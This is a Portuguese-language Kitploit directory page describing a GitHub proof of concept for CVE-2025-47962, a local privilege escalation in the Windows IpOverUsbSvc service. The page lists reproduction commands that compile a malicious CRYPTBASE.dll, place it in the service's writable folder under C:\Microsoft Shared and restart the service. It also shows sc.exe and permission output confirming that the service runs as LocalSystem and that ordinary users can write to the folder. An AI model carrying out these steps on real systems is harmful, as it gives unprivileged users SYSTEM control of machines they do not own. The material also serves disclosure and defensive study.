Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47962-POC — Prova de conceito para CVE-2025-47962 demonstrando escalada de privilégio local via sequestro de DLL no serviço Windows IpOverUsbSvc devido a permissões de diretório inseguras. | Kitploit
Ferramentas/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralExploração de Binários
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

Prova de conceito para CVE-2025-47962 demonstrando escalada de privilégio local via sequestro de DLL no serviço Windows IpOverUsbSvc devido a permissões de diretório inseguras.

Ver Repositório
41há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-47962-POC

Processo de reprodução: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc imagem

Explicação: IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

Executa com privilégios de LocalSystem. O executável está localizado no diretório C:\Microsoft Shared, sobre o qual os utilizadores padrão possuem permissões de controlo total. Foi descoberto que utilizadores comuns podem escrever ficheiros no diretório de serviço SYSTEM. Em seguida, monitorize a DLL imagem imagem imagem

As permissões para o diretório C:\Microsoft Shared\ criado durante a instalação do Windows SDK estão configuradas incorretamente:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
Baixar ferramenta